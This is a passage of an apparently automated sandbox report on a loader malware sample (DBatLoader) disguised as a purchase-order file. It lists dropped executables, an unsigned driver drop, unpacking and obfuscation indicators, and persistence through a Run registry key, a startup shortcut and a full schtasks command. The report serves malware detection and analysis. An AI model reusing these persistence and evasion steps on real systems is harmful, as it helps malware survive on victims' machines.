                          Source: Binary string: easinvoker.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdbGCTL source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C19000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954746218.0000000021C48000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.000000000082A000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000003.23057348047.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23136430949.00000000007C3000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack
                          Yara detected DBatLoader
                          Source: Yara matchFile source: 0.2.PO_B2W984.com.24366a8.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.PO_B2W984.com.2dd0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.PO_B2W984.com.24366a8.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000001.22963397742.00000000017D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.22967000001.0000000002436000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: rpkhzpuO.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02DE8798
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD32FC push eax; ret 0_2_02DD3338
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DFC2FC push 02DFC367h; ret 0_2_02DFC35F
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD635C push 02DD63B7h; ret 0_2_02DD63AF
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD635A push 02DD63B7h; ret 0_2_02DD63AF
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DFC0AC push 02DFC125h; ret 0_2_02DFC11D
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DFC1F8 push 02DFC288h; ret 0_2_02DFC280
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DFC144 push 02DFC1ECh; ret 0_2_02DFC1E4
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE86B8 push 02DE86FAh; ret 0_2_02DE86F2
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD6738 push 02DD677Ah; ret 0_2_02DD6772
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD6736 push 02DD677Ah; ret 0_2_02DD6772
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DDC4EC push ecx; mov dword ptr [esp], edx0_2_02DDC4F1
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEE5AC push ecx; mov dword ptr [esp], edx0_2_02DEE5B1
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DDD520 push 02DDD54Ch; ret 0_2_02DDD544
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DDCB5B push 02DDCCF2h; ret 0_2_02DDCCEA
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DDCB6C push 02DDCCF2h; ret 0_2_02DDCCEA
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DFBB64 push 02DFBD8Ch; ret 0_2_02DFBD84
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE68C8 push 02DE6973h; ret 0_2_02DE696B
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE68C6 push 02DE6973h; ret 0_2_02DE696B
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE788C push 02DE7909h; ret 0_2_02DE7901
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEA918 push 02DEA950h; ret 0_2_02DEA948
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEA917 push 02DEA950h; ret 0_2_02DEA948
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE8910 push 02DE8948h; ret 0_2_02DE8940
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE890E push 02DE8948h; ret 0_2_02DE8940
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE2EE0 push 02DE2F56h; ret 0_2_02DE2F4E
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE2FEC push 02DE3039h; ret 0_2_02DE3031
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE2FEB push 02DE3039h; ret 0_2_02DE3031
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE5DFC push ecx; mov dword ptr [esp], edx0_2_02DE5DFE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0041C40C push cs; iretd 4_1_0041C4E2
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_00423149 push eax; ret 4_1_00423179
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_0041C50E push cs; iretd 4_1_0041C4E2
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004231C8 push eax; ret 4_1_00423179
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.2ead3d90.10.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                          Source: 15.2.rpkhzpuO.pif.304e0000.11.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'DEa0csVGIAPRG', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with a suspicious file extension
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                          Sample is not signed and drops a device driver
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file

                          Boot Survival

                          barindex
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DEA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02DEA954
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
